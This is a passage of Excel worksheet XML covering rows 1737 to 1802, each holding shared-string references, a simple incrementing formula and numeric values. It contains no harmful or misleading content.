        <v>6.5856976509094238</v>
      </c>
      <c r="F1737">
        <v>2</v>
      </c>
    </row>
    <row r="1738" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1738" t="s">
        <v>3352</v>
      </c>
      <c r="B1738" t="s">
        <v>3353</v>
      </c>
      <c r="C1738">
        <f t="shared" ref="C1738:C1801" si="27">C1737+1253</f>
        <v>11606649</v>
      </c>
      <c r="D1738" t="s">
        <v>3354</v>
      </c>
      <c r="E1738">
        <v>21.636978149414059</v>
      </c>
      <c r="F1738">
        <v>1</v>
      </c>
    </row>
    <row r="1739" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1739" t="s">
        <v>3352</v>
      </c>
      <c r="B1739" t="s">
        <v>3353</v>
      </c>
      <c r="C1739">
        <f t="shared" si="27"/>
        <v>11607902</v>
      </c>
      <c r="D1739" t="s">
        <v>3355</v>
      </c>
      <c r="E1739">
        <v>3.810574054718018</v>
      </c>
      <c r="F1739">
        <v>2</v>
      </c>
    </row>
    <row r="1740" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1740" t="s">
        <v>3356</v>
      </c>
      <c r="B1740" t="s">
        <v>3357</v>
      </c>
      <c r="C1740">
        <f t="shared" si="27"/>
        <v>11609155</v>
      </c>
      <c r="D1740" t="s">
        <v>3358</v>
      </c>
      <c r="E1740">
        <v>22.68381309509277</v>
      </c>
      <c r="F1740">
        <v>1</v>
      </c>
    </row>
    <row r="1741" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1741" t="s">
        <v>3356</v>
      </c>
      <c r="B1741" t="s">
        <v>3357</v>
      </c>
      <c r="C1741">
        <f t="shared" si="27"/>
        <v>11610408</v>
      </c>
      <c r="D1741" t="s">
        <v>3359</v>
      </c>
      <c r="E1741">
        <v>9.8857574462890625</v>
      </c>
      <c r="F1741">
        <v>2</v>
      </c>
    </row>
    <row r="1742" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1742" t="s">
        <v>3360</v>
      </c>
      <c r="B1742" t="s">
        <v>3361</v>
      </c>
      <c r="C1742">
        <f t="shared" si="27"/>
        <v>11611661</v>
      </c>
      <c r="D1742" t="s">
        <v>3362</v>
      </c>
      <c r="E1742">
        <v>20.42951774597168</v>
      </c>
      <c r="F1742">
        <v>1</v>
      </c>
    </row>
    <row r="1743" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1743" t="s">
        <v>3360</v>
      </c>
      <c r="B1743" t="s">
        <v>3361</v>
      </c>
      <c r="C1743">
        <f t="shared" si="27"/>
        <v>11612914</v>
      </c>
      <c r="D1743" t="s">
        <v>3363</v>
      </c>
      <c r="E1743">
        <v>16.885530471801761</v>
      </c>
      <c r="F1743">
        <v>2</v>
      </c>
    </row>
    <row r="1744" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1744" t="s">
        <v>3364</v>
      </c>
      <c r="B1744" t="s">
        <v>3365</v>
      </c>
      <c r="C1744">
        <f t="shared" si="27"/>
        <v>11614167</v>
      </c>
      <c r="D1744" t="s">
        <v>3366</v>
      </c>
      <c r="E1744">
        <v>3.9189574718475342</v>
      </c>
      <c r="F1744">
        <v>1</v>
      </c>
    </row>
    <row r="1745" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1745" t="s">
        <v>3364</v>
      </c>
      <c r="B1745" t="s">
        <v>3365</v>
      </c>
      <c r="C1745">
        <f t="shared" si="27"/>
        <v>11615420</v>
      </c>
      <c r="D1745" t="s">
        <v>3367</v>
      </c>
      <c r="E1745">
        <v>3.8358199596405029</v>
      </c>
      <c r="F1745">
        <v>2</v>
      </c>
    </row>
    <row r="1746" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1746" t="s">
        <v>3368</v>
      </c>
      <c r="B1746" t="s">
        <v>3369</v>
      </c>
      <c r="C1746">
        <f t="shared" si="27"/>
        <v>11616673</v>
      </c>
      <c r="D1746" t="s">
        <v>3370</v>
      </c>
      <c r="E1746">
        <v>38.421455383300781</v>
      </c>
      <c r="F1746">
        <v>1</v>
      </c>
    </row>
    <row r="1747" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1747" t="s">
        <v>3368</v>
      </c>
      <c r="B1747" t="s">
        <v>3369</v>
      </c>
      <c r="C1747">
        <f t="shared" si="27"/>
        <v>11617926</v>
      </c>
      <c r="D1747" t="s">
        <v>3371</v>
      </c>
      <c r="E1747">
        <v>9.0086631774902344</v>
      </c>
      <c r="F1747">
        <v>2</v>
      </c>
    </row>
    <row r="1748" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1748" t="s">
        <v>3372</v>
      </c>
      <c r="B1748" t="s">
        <v>3373</v>
      </c>
      <c r="C1748">
        <f t="shared" si="27"/>
        <v>11619179</v>
      </c>
      <c r="D1748" t="s">
        <v>403</v>
      </c>
      <c r="E1748">
        <v>26.179094314575199</v>
      </c>
      <c r="F1748">
        <v>1</v>
      </c>
    </row>
    <row r="1749" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1749" t="s">
        <v>3372</v>
      </c>
      <c r="B1749" t="s">
        <v>3373</v>
      </c>
      <c r="C1749">
        <f t="shared" si="27"/>
        <v>11620432</v>
      </c>
      <c r="D1749" t="s">
        <v>3374</v>
      </c>
      <c r="E1749">
        <v>11.22355842590332</v>
      </c>
      <c r="F1749">
        <v>2</v>
      </c>
    </row>
    <row r="1750" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1750" t="s">
        <v>3375</v>
      </c>
      <c r="B1750" t="s">
        <v>3376</v>
      </c>
      <c r="C1750">
        <f t="shared" si="27"/>
        <v>11621685</v>
      </c>
      <c r="D1750" t="s">
        <v>3377</v>
      </c>
      <c r="E1750">
        <v>28.75863075256348</v>
      </c>
      <c r="F1750">
        <v>1</v>
      </c>
    </row>
    <row r="1751" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1751" t="s">
        <v>3375</v>
      </c>
      <c r="B1751" t="s">
        <v>3376</v>
      </c>
      <c r="C1751">
        <f t="shared" si="27"/>
        <v>11622938</v>
      </c>
      <c r="D1751" t="s">
        <v>3378</v>
      </c>
      <c r="E1751">
        <v>9.0438632965087891</v>
      </c>
      <c r="F1751">
        <v>2</v>
      </c>
    </row>
    <row r="1752" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1752" t="s">
        <v>3379</v>
      </c>
      <c r="B1752" t="s">
        <v>3380</v>
      </c>
      <c r="C1752">
        <f t="shared" si="27"/>
        <v>11624191</v>
      </c>
      <c r="D1752" t="s">
        <v>3381</v>
      </c>
      <c r="E1752">
        <v>17.814712524414059</v>
      </c>
      <c r="F1752">
        <v>1</v>
      </c>
    </row>
    <row r="1753" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1753" t="s">
        <v>3379</v>
      </c>
      <c r="B1753" t="s">
        <v>3380</v>
      </c>
      <c r="C1753">
        <f t="shared" si="27"/>
        <v>11625444</v>
      </c>
      <c r="D1753" t="s">
        <v>3382</v>
      </c>
      <c r="E1753">
        <v>4.3581538200378418</v>
      </c>
      <c r="F1753">
        <v>2</v>
      </c>
    </row>
    <row r="1754" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1754" t="s">
        <v>3383</v>
      </c>
      <c r="B1754" t="s">
        <v>3384</v>
      </c>
      <c r="C1754">
        <f t="shared" si="27"/>
        <v>11626697</v>
      </c>
      <c r="D1754" t="s">
        <v>3385</v>
      </c>
      <c r="E1754">
        <v>25.293132781982418</v>
      </c>
      <c r="F1754">
        <v>1</v>
      </c>
    </row>
    <row r="1755" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1755" t="s">
        <v>3383</v>
      </c>
      <c r="B1755" t="s">
        <v>3386</v>
      </c>
      <c r="C1755">
        <f t="shared" si="27"/>
        <v>11627950</v>
      </c>
      <c r="D1755" t="s">
        <v>3387</v>
      </c>
      <c r="E1755">
        <v>4.8967103958129883</v>
      </c>
      <c r="F1755">
        <v>2</v>
      </c>
    </row>
    <row r="1756" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1756" t="s">
        <v>3388</v>
      </c>
      <c r="B1756" t="s">
        <v>3389</v>
      </c>
      <c r="C1756">
        <f t="shared" si="27"/>
        <v>11629203</v>
      </c>
      <c r="D1756" t="s">
        <v>3390</v>
      </c>
      <c r="E1756">
        <v>20.59041786193848</v>
      </c>
      <c r="F1756">
        <v>1</v>
      </c>
    </row>
    <row r="1757" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1757" t="s">
        <v>3388</v>
      </c>
      <c r="B1757" t="s">
        <v>3389</v>
      </c>
      <c r="C1757">
        <f t="shared" si="27"/>
        <v>11630456</v>
      </c>
      <c r="D1757" t="s">
        <v>3391</v>
      </c>
      <c r="E1757">
        <v>11.158229827880859</v>
      </c>
      <c r="F1757">
        <v>2</v>
      </c>
    </row>
    <row r="1758" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1758" t="s">
        <v>3392</v>
      </c>
      <c r="B1758" t="s">
        <v>3393</v>
      </c>
      <c r="C1758">
        <f t="shared" si="27"/>
        <v>11631709</v>
      </c>
      <c r="D1758" t="s">
        <v>3394</v>
      </c>
      <c r="E1758">
        <v>37.035675048828118</v>
      </c>
      <c r="F1758">
        <v>1</v>
      </c>
    </row>
    <row r="1759" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1759" t="s">
        <v>3392</v>
      </c>
      <c r="B1759" t="s">
        <v>3393</v>
      </c>
      <c r="C1759">
        <f t="shared" si="27"/>
        <v>11632962</v>
      </c>
      <c r="D1759" t="s">
        <v>3395</v>
      </c>
      <c r="E1759">
        <v>2.339497767388821E-2</v>
      </c>
      <c r="F1759">
        <v>2</v>
      </c>
    </row>
    <row r="1760" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1760" t="s">
        <v>3396</v>
      </c>
      <c r="B1760" t="s">
        <v>3397</v>
      </c>
      <c r="C1760">
        <f t="shared" si="27"/>
        <v>11634215</v>
      </c>
      <c r="D1760" t="s">
        <v>3398</v>
      </c>
      <c r="E1760">
        <v>26.19405364990234</v>
      </c>
      <c r="F1760">
        <v>1</v>
      </c>
    </row>
    <row r="1761" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1761" t="s">
        <v>3396</v>
      </c>
      <c r="B1761" t="s">
        <v>3397</v>
      </c>
      <c r="C1761">
        <f t="shared" si="27"/>
        <v>11635468</v>
      </c>
      <c r="D1761" t="s">
        <v>3399</v>
      </c>
      <c r="E1761">
        <v>16.070558547973629</v>
      </c>
      <c r="F1761">
        <v>2</v>
      </c>
    </row>
    <row r="1762" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1762" t="s">
        <v>3400</v>
      </c>
      <c r="B1762" t="s">
        <v>3401</v>
      </c>
      <c r="C1762">
        <f t="shared" si="27"/>
        <v>11636721</v>
      </c>
      <c r="D1762" t="s">
        <v>3402</v>
      </c>
      <c r="E1762">
        <v>29.107328414916989</v>
      </c>
      <c r="F1762">
        <v>1</v>
      </c>
    </row>
    <row r="1763" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1763" t="s">
        <v>3400</v>
      </c>
      <c r="B1763" t="s">
        <v>3401</v>
      </c>
      <c r="C1763">
        <f t="shared" si="27"/>
        <v>11637974</v>
      </c>
      <c r="D1763" t="s">
        <v>3403</v>
      </c>
      <c r="E1763">
        <v>8.6063547134399414</v>
      </c>
      <c r="F1763">
        <v>2</v>
      </c>
    </row>
    <row r="1764" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1764" t="s">
        <v>3404</v>
      </c>
      <c r="B1764" t="s">
        <v>3405</v>
      </c>
      <c r="C1764">
        <f t="shared" si="27"/>
        <v>11639227</v>
      </c>
      <c r="D1764" t="s">
        <v>3406</v>
      </c>
      <c r="E1764">
        <v>28.168880462646481</v>
      </c>
      <c r="F1764">
        <v>1</v>
      </c>
    </row>
    <row r="1765" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1765" t="s">
        <v>3404</v>
      </c>
      <c r="B1765" t="s">
        <v>3405</v>
      </c>
      <c r="C1765">
        <f t="shared" si="27"/>
        <v>11640480</v>
      </c>
      <c r="D1765" t="s">
        <v>3407</v>
      </c>
      <c r="E1765">
        <v>0.86664831638336182</v>
      </c>
      <c r="F1765">
        <v>2</v>
      </c>
    </row>
    <row r="1766" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1766" t="s">
        <v>3408</v>
      </c>
      <c r="B1766" t="s">
        <v>3409</v>
      </c>
      <c r="C1766">
        <f t="shared" si="27"/>
        <v>11641733</v>
      </c>
      <c r="D1766" t="s">
        <v>3410</v>
      </c>
      <c r="E1766">
        <v>36.864978790283203</v>
      </c>
      <c r="F1766">
        <v>1</v>
      </c>
    </row>
    <row r="1767" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1767" t="s">
        <v>3408</v>
      </c>
      <c r="B1767" t="s">
        <v>3409</v>
      </c>
      <c r="C1767">
        <f t="shared" si="27"/>
        <v>11642986</v>
      </c>
      <c r="D1767" t="s">
        <v>3411</v>
      </c>
      <c r="E1767">
        <v>10.41555976867676</v>
      </c>
      <c r="F1767">
        <v>2</v>
      </c>
    </row>
    <row r="1768" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1768" t="s">
        <v>3412</v>
      </c>
      <c r="B1768" t="s">
        <v>3413</v>
      </c>
      <c r="C1768">
        <f t="shared" si="27"/>
        <v>11644239</v>
      </c>
      <c r="D1768" t="s">
        <v>3414</v>
      </c>
      <c r="E1768">
        <v>21.208530426025391</v>
      </c>
      <c r="F1768">
        <v>1</v>
      </c>
    </row>
    <row r="1769" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1769" t="s">
        <v>3412</v>
      </c>
      <c r="B1769" t="s">
        <v>3413</v>
      </c>
      <c r="C1769">
        <f t="shared" si="27"/>
        <v>11645492</v>
      </c>
      <c r="D1769" t="s">
        <v>3415</v>
      </c>
      <c r="E1769">
        <v>11.010007858276371</v>
      </c>
      <c r="F1769">
        <v>2</v>
      </c>
    </row>
    <row r="1770" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1770" t="s">
        <v>3416</v>
      </c>
      <c r="B1770" t="s">
        <v>3417</v>
      </c>
      <c r="C1770">
        <f t="shared" si="27"/>
        <v>11646745</v>
      </c>
      <c r="D1770" t="s">
        <v>3418</v>
      </c>
      <c r="E1770">
        <v>22.732509613037109</v>
      </c>
      <c r="F1770">
        <v>1</v>
      </c>
    </row>
    <row r="1771" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1771" t="s">
        <v>3416</v>
      </c>
      <c r="B1771" t="s">
        <v>3417</v>
      </c>
      <c r="C1771">
        <f t="shared" si="27"/>
        <v>11647998</v>
      </c>
      <c r="D1771" t="s">
        <v>3419</v>
      </c>
      <c r="E1771">
        <v>0.13584105670452121</v>
      </c>
      <c r="F1771">
        <v>2</v>
      </c>
    </row>
    <row r="1772" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1772" t="s">
        <v>3420</v>
      </c>
      <c r="B1772" t="s">
        <v>3421</v>
      </c>
      <c r="C1772">
        <f t="shared" si="27"/>
        <v>11649251</v>
      </c>
      <c r="D1772" t="s">
        <v>3422</v>
      </c>
      <c r="E1772">
        <v>19.651067733764648</v>
      </c>
      <c r="F1772">
        <v>1</v>
      </c>
    </row>
    <row r="1773" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1773" t="s">
        <v>3420</v>
      </c>
      <c r="B1773" t="s">
        <v>3421</v>
      </c>
      <c r="C1773">
        <f t="shared" si="27"/>
        <v>11650504</v>
      </c>
      <c r="D1773" t="s">
        <v>3423</v>
      </c>
      <c r="E1773">
        <v>15.70165920257568</v>
      </c>
      <c r="F1773">
        <v>2</v>
      </c>
    </row>
    <row r="1774" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1774" t="s">
        <v>3424</v>
      </c>
      <c r="B1774" t="s">
        <v>3425</v>
      </c>
      <c r="C1774">
        <f t="shared" si="27"/>
        <v>11651757</v>
      </c>
      <c r="D1774" t="s">
        <v>3426</v>
      </c>
      <c r="E1774">
        <v>31.128486633300781</v>
      </c>
      <c r="F1774">
        <v>1</v>
      </c>
    </row>
    <row r="1775" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1775" t="s">
        <v>3424</v>
      </c>
      <c r="B1775" t="s">
        <v>3425</v>
      </c>
      <c r="C1775">
        <f t="shared" si="27"/>
        <v>11653010</v>
      </c>
      <c r="D1775" t="s">
        <v>3427</v>
      </c>
      <c r="E1775">
        <v>2.4250607490539551</v>
      </c>
      <c r="F1775">
        <v>2</v>
      </c>
    </row>
    <row r="1776" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1776" t="s">
        <v>3428</v>
      </c>
      <c r="B1776" t="s">
        <v>3429</v>
      </c>
      <c r="C1776">
        <f t="shared" si="27"/>
        <v>11654263</v>
      </c>
      <c r="D1776" t="s">
        <v>3430</v>
      </c>
      <c r="E1776">
        <v>23.88272666931152</v>
      </c>
      <c r="F1776">
        <v>1</v>
      </c>
    </row>
    <row r="1777" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1777" t="s">
        <v>3428</v>
      </c>
      <c r="B1777" t="s">
        <v>3429</v>
      </c>
      <c r="C1777">
        <f t="shared" si="27"/>
        <v>11655516</v>
      </c>
      <c r="D1777" t="s">
        <v>3431</v>
      </c>
      <c r="E1777">
        <v>6.9495835304260254</v>
      </c>
      <c r="F1777">
        <v>2</v>
      </c>
    </row>
    <row r="1778" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1778" t="s">
        <v>3432</v>
      </c>
      <c r="B1778" t="s">
        <v>3433</v>
      </c>
      <c r="C1778">
        <f t="shared" si="27"/>
        <v>11656769</v>
      </c>
      <c r="D1778" t="s">
        <v>3434</v>
      </c>
      <c r="E1778">
        <v>24.396097183227539</v>
      </c>
      <c r="F1778">
        <v>1</v>
      </c>
    </row>
    <row r="1779" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1779" t="s">
        <v>3432</v>
      </c>
      <c r="B1779" t="s">
        <v>3433</v>
      </c>
      <c r="C1779">
        <f t="shared" si="27"/>
        <v>11658022</v>
      </c>
      <c r="D1779" t="s">
        <v>3435</v>
      </c>
      <c r="E1779">
        <v>13.087447166442869</v>
      </c>
      <c r="F1779">
        <v>2</v>
      </c>
    </row>
    <row r="1780" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1780" t="s">
        <v>3436</v>
      </c>
      <c r="B1780" t="s">
        <v>3437</v>
      </c>
      <c r="C1780">
        <f t="shared" si="27"/>
        <v>11659275</v>
      </c>
      <c r="D1780" t="s">
        <v>3438</v>
      </c>
      <c r="E1780">
        <v>31.363307952880859</v>
      </c>
      <c r="F1780">
        <v>1</v>
      </c>
    </row>
    <row r="1781" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1781" t="s">
        <v>3436</v>
      </c>
      <c r="B1781" t="s">
        <v>3437</v>
      </c>
      <c r="C1781">
        <f t="shared" si="27"/>
        <v>11660528</v>
      </c>
      <c r="D1781" t="s">
        <v>3439</v>
      </c>
      <c r="E1781">
        <v>7.0167551040649414</v>
      </c>
      <c r="F1781">
        <v>2</v>
      </c>
    </row>
    <row r="1782" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1782" t="s">
        <v>3440</v>
      </c>
      <c r="B1782" t="s">
        <v>3441</v>
      </c>
      <c r="C1782">
        <f t="shared" si="27"/>
        <v>11661781</v>
      </c>
      <c r="D1782" t="s">
        <v>3442</v>
      </c>
      <c r="E1782">
        <v>23.60890960693359</v>
      </c>
      <c r="F1782">
        <v>1</v>
      </c>
    </row>
    <row r="1783" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1783" t="s">
        <v>3440</v>
      </c>
      <c r="B1783" t="s">
        <v>3441</v>
      </c>
      <c r="C1783">
        <f t="shared" si="27"/>
        <v>11663034</v>
      </c>
      <c r="D1783" t="s">
        <v>3443</v>
      </c>
      <c r="E1783">
        <v>15.476321220397949</v>
      </c>
      <c r="F1783">
        <v>2</v>
      </c>
    </row>
    <row r="1784" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1784" t="s">
        <v>3444</v>
      </c>
      <c r="B1784" t="s">
        <v>3401</v>
      </c>
      <c r="C1784">
        <f t="shared" si="27"/>
        <v>11664287</v>
      </c>
      <c r="D1784" t="s">
        <v>3402</v>
      </c>
      <c r="E1784">
        <v>29.25284385681152</v>
      </c>
      <c r="F1784">
        <v>1</v>
      </c>
    </row>
    <row r="1785" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1785" t="s">
        <v>3444</v>
      </c>
      <c r="B1785" t="s">
        <v>3401</v>
      </c>
      <c r="C1785">
        <f t="shared" si="27"/>
        <v>11665540</v>
      </c>
      <c r="D1785" t="s">
        <v>3445</v>
      </c>
      <c r="E1785">
        <v>12.692756652832029</v>
      </c>
      <c r="F1785">
        <v>2</v>
      </c>
    </row>
    <row r="1786" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1786" t="s">
        <v>3446</v>
      </c>
      <c r="B1786" t="s">
        <v>3447</v>
      </c>
      <c r="C1786">
        <f t="shared" si="27"/>
        <v>11666793</v>
      </c>
      <c r="D1786" t="s">
        <v>3448</v>
      </c>
      <c r="E1786">
        <v>38.600639343261719</v>
      </c>
      <c r="F1786">
        <v>1</v>
      </c>
    </row>
    <row r="1787" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1787" t="s">
        <v>3446</v>
      </c>
      <c r="B1787" t="s">
        <v>3447</v>
      </c>
      <c r="C1787">
        <f t="shared" si="27"/>
        <v>11668046</v>
      </c>
      <c r="D1787" t="s">
        <v>3449</v>
      </c>
      <c r="E1787">
        <v>12.647294998168951</v>
      </c>
      <c r="F1787">
        <v>2</v>
      </c>
    </row>
    <row r="1788" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1788" t="s">
        <v>3450</v>
      </c>
      <c r="B1788" t="s">
        <v>3451</v>
      </c>
      <c r="C1788">
        <f t="shared" si="27"/>
        <v>11669299</v>
      </c>
      <c r="D1788" t="s">
        <v>3452</v>
      </c>
      <c r="E1788">
        <v>38.89892578125</v>
      </c>
      <c r="F1788">
        <v>1</v>
      </c>
    </row>
    <row r="1789" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1789" t="s">
        <v>3450</v>
      </c>
      <c r="B1789" t="s">
        <v>3451</v>
      </c>
      <c r="C1789">
        <f t="shared" si="27"/>
        <v>11670552</v>
      </c>
      <c r="D1789" t="s">
        <v>3453</v>
      </c>
      <c r="E1789">
        <v>2.6899945735931401</v>
      </c>
      <c r="F1789">
        <v>2</v>
      </c>
    </row>
    <row r="1790" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1790" t="s">
        <v>3454</v>
      </c>
      <c r="B1790" t="s">
        <v>3455</v>
      </c>
      <c r="C1790">
        <f t="shared" si="27"/>
        <v>11671805</v>
      </c>
      <c r="D1790" t="s">
        <v>3456</v>
      </c>
      <c r="E1790">
        <v>16.952419281005859</v>
      </c>
      <c r="F1790">
        <v>1</v>
      </c>
    </row>
    <row r="1791" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1791" t="s">
        <v>3454</v>
      </c>
      <c r="B1791" t="s">
        <v>3455</v>
      </c>
      <c r="C1791">
        <f t="shared" si="27"/>
        <v>11673058</v>
      </c>
      <c r="D1791" t="s">
        <v>3457</v>
      </c>
      <c r="E1791">
        <v>13.53512382507324</v>
      </c>
      <c r="F1791">
        <v>2</v>
      </c>
    </row>
    <row r="1792" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1792" t="s">
        <v>3458</v>
      </c>
      <c r="B1792" t="s">
        <v>3459</v>
      </c>
      <c r="C1792">
        <f t="shared" si="27"/>
        <v>11674311</v>
      </c>
      <c r="D1792" t="s">
        <v>3460</v>
      </c>
      <c r="E1792">
        <v>27.742155075073239</v>
      </c>
      <c r="F1792">
        <v>1</v>
      </c>
    </row>
    <row r="1793" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1793" t="s">
        <v>3458</v>
      </c>
      <c r="B1793" t="s">
        <v>3459</v>
      </c>
      <c r="C1793">
        <f t="shared" si="27"/>
        <v>11675564</v>
      </c>
      <c r="D1793" t="s">
        <v>3461</v>
      </c>
      <c r="E1793">
        <v>2.5132173672318459E-2</v>
      </c>
      <c r="F1793">
        <v>2</v>
      </c>
    </row>
    <row r="1794" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1794" t="s">
        <v>3462</v>
      </c>
      <c r="B1794" t="s">
        <v>3463</v>
      </c>
      <c r="C1794">
        <f t="shared" si="27"/>
        <v>11676817</v>
      </c>
      <c r="D1794" t="s">
        <v>3464</v>
      </c>
      <c r="E1794">
        <v>34.119159698486328</v>
      </c>
      <c r="F1794">
        <v>1</v>
      </c>
    </row>
    <row r="1795" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1795" t="s">
        <v>3462</v>
      </c>
      <c r="B1795" t="s">
        <v>3463</v>
      </c>
      <c r="C1795">
        <f t="shared" si="27"/>
        <v>11678070</v>
      </c>
      <c r="D1795" t="s">
        <v>3465</v>
      </c>
      <c r="E1795">
        <v>10.573770523071291</v>
      </c>
      <c r="F1795">
        <v>2</v>
      </c>
    </row>
    <row r="1796" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1796" t="s">
        <v>3466</v>
      </c>
      <c r="B1796" t="s">
        <v>3467</v>
      </c>
      <c r="C1796">
        <f t="shared" si="27"/>
        <v>11679323</v>
      </c>
      <c r="D1796" t="s">
        <v>3468</v>
      </c>
      <c r="E1796">
        <v>14.08977794647217</v>
      </c>
      <c r="F1796">
        <v>1</v>
      </c>
    </row>
    <row r="1797" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1797" t="s">
        <v>3466</v>
      </c>
      <c r="B1797" t="s">
        <v>3467</v>
      </c>
      <c r="C1797">
        <f t="shared" si="27"/>
        <v>11680576</v>
      </c>
      <c r="D1797" t="s">
        <v>3469</v>
      </c>
      <c r="E1797">
        <v>0.51443600654602051</v>
      </c>
      <c r="F1797">
        <v>2</v>
      </c>
    </row>
    <row r="1798" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1798" t="s">
        <v>3470</v>
      </c>
      <c r="B1798" t="s">
        <v>3471</v>
      </c>
      <c r="C1798">
        <f t="shared" si="27"/>
        <v>11681829</v>
      </c>
      <c r="D1798" t="s">
        <v>3472</v>
      </c>
      <c r="E1798">
        <v>30.50325775146484</v>
      </c>
      <c r="F1798">
        <v>1</v>
      </c>
    </row>
    <row r="1799" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1799" t="s">
        <v>3470</v>
      </c>
      <c r="B1799" t="s">
        <v>3471</v>
      </c>
      <c r="C1799">
        <f t="shared" si="27"/>
        <v>11683082</v>
      </c>
      <c r="D1799" t="s">
        <v>3473</v>
      </c>
      <c r="E1799">
        <v>4.3346295356750488</v>
      </c>
      <c r="F1799">
        <v>2</v>
      </c>
    </row>
    <row r="1800" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1800" t="s">
        <v>3474</v>
      </c>
      <c r="B1800" t="s">
        <v>3475</v>
      </c>
      <c r="C1800">
        <f t="shared" si="27"/>
        <v>11684335</v>
      </c>
      <c r="D1800" t="s">
        <v>3476</v>
      </c>
      <c r="E1800">
        <v>39.341121673583977</v>
      </c>
      <c r="F1800">
        <v>1</v>
      </c>
    </row>
    <row r="1801" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1801" t="s">
        <v>3474</v>
      </c>
      <c r="B1801" t="s">
        <v>3475</v>
      </c>
      <c r="C1801">
        <f t="shared" si="27"/>
        <v>11685588</v>
      </c>
      <c r="D1801" t="s">
        <v>3477</v>
      </c>
      <c r="E1801">
        <v>0.24068064987659449</v>
      </c>
      <c r="F1801">
        <v>2</v>
      </c>
    </row>
    <row r="1802" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1802" t="s">
        <v>3478</v>
      </c>
      <c r="B1802" t="s">
        <v>3479</v>
      </c>
      <c r="C1802">
        <f t="shared" ref="C1802:C1865" si="28">C1801+1253</f>
        <v>11686841</v>
      </c>
      <c r="D1802" t="s">
        <v>3464</v>
      </c>
